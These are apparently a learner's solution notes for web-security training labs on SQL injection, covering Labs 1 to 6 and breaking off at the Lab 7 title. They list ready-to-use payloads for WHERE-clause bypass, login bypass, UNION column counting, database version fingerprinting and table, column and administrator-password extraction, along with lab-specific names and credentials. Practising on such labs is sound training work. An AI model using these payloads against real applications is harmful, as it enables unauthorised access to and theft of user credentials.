SQL injection
____________________________________________________________________________________________________________________________
Lab1.Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

SELECT * FROM products WHERE category = 'Gifts' AND released = 1

Ans :" GET /filter?category='+or+1%3d1-- HTTP/2 "
SELECT * FROM products WHERE category = 'Gifts' or 1=1 --

____________________________________________________________________________________________________________________________
Lab2 : Lab: SQL injection vulnerability allowing login bypass
       select user from users where username='admin' and password='xyzz';

Ans :  select user from users where username='admin' -- ;
       Set-Cookie: session=97DAaA1HHJNKuXkRqL6HoyyNuaDbeHj1; 

____________________________________________________________________________________________________________________________
Lab3 : Lab: SQL injection attack, querying the database type and version on Oracle

Ans  : category='
       category='--+

    - No of columns
       'union select null from dual--
       'union select null,null from dual--

    -  String / data type of colums
       'union select 'ABC',NULL from dual--

    - Version OF DB
       'UNION SELECT BANNER,NULL FROM v$version--


____________________________________________________________________________________________________________________________
Lab4 : SQL injection attack, querying the database type and version on MySQL and Microsoft

Ans  : GET /filter?category='
       GET /filter?category='--+

     - No of Columns
       ' union select null --+ Error
       ' union select null,null --+ 

       ' order by 1--+
       ' order by 2--+
       ' order by 3--+ Error
     - Data Type
       ' union select 'ABC','DEF' --+
     -MySQL and Microsoft DB Version
       ' union select @@version,'DEF' --+


____________________________________________________________________________________________________________________________
Lab5: SQL injection attack, listing the database contents on non-Oracle databases

Given : DB contains a table that holds usernames and passwords columns .

Q.      You need to determine the name of this table  & pASSWORD OF administrator

Ans  : GET /filter?category='
       GET /filter?category='--+

     - No of Columns
       ' union select null --+ Error
       ' union select null,null --+ 

       ' order by 1--+
       ' order by 2--+
       ' order by 3--+ Error
     - Data Type
       ' union select 'ABC','DEF' --+

     - Find DataBase Type:
       'union select version(),'DEF' --+  : PgSql
       
       'union select @@version,'DEF' --+  : MYSql/MS-SQL

       'union SELECT banner,'DEF' FROM v$version  --+   :Oracle 
       'union SELECT version,'DEF' FROM v$instance --+  :Oracle 

     - Find Table Name : Pgsql

      ' union select table_name,'ABC' from information_schema.tables --+

        Ans : users_onouxe,pg_user

     - Find columns :Pgsql

      ' UNION SELECT column_name, 'ABC' FROM information_schema.columns WHERE table_name='pg_user' --+
      ' UNION SELECT column_name, 'ABC' FROM information_schema.columns WHERE table_name='users_onouxe'--+


    - Find Password OF  administrator : 

      ' UNION SELECT password_rqmxso , 'ABC' FROM users_onouxe WHERE username_funlze='administrator' --+


___________________________________________________________________________________________
Lab6: SQL injection attack, listing the database contents on Oracle

GIVEN  :The database contains a table that holds usernames and passwords

        You need to determine the name of this table and the columns it contains, then retrieve the PASSWD OF administrator

ANS : GET /filter?category=Gifts'--+

      - find no of columns
        ' union select null,null from dual --+ : oracle db only

      -find data type of columns 
       ' union select 'ABC','DEF' from dual --+


      -find table name from Oracle DB 

      'union SELECT table_name,'ABC' FROM user_tables --+  : USERS_BYFICP ,PRODUCTS

     -Find colums name from Oracle DB  tables

      'union SELECT column_name,'ABC' FROM   all_tab_columns WHERE  table_name = 'USERS_BYFICP' --+ : USERNAME_SLTNDT ,PASSWORD_KWSPKR 

     - Find Password of user administrator

      'UNION SELECT PASSWORD_KWSPKR,'ABC' FROM USERS_BYFICP WHERE USERNAME_SLTNDT='administrator' --+  : nvtzkic1pfd8yay6eptu

___________________________________________________________________________________________
Lab7: SQL injection UNION attack, determining the number of columns returned by the query
